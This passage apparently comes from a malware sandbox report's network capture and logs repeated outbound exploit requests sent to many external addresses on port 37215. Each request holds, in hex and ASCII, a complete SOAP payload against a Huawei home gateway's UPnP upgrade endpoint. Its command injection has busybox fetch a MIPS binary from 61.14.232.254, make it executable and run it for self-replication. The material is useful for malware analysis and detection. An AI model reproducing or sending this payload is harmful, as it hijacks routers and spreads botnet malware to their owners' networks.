6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  224192.168.2.1357576197.78.27.4737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.667402983 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  225192.168.2.1355520157.153.225.11337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.667488098 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  226192.168.2.1360890197.209.43.16337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.667661905 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  227192.168.2.133945641.189.103.16237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.667690039 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  228192.168.2.1338786157.150.38.8937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.667715073 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  229192.168.2.1346408157.202.157.24937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.667819023 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  230192.168.2.135700441.192.140.7237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.667820930 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  231192.168.2.133953260.255.171.21437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.667821884 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  232192.168.2.1334438157.30.70.20137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.667836905 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  233192.168.2.1357140157.42.117.4637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.667853117 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  234192.168.2.1350728156.88.100.7837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.667880058 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
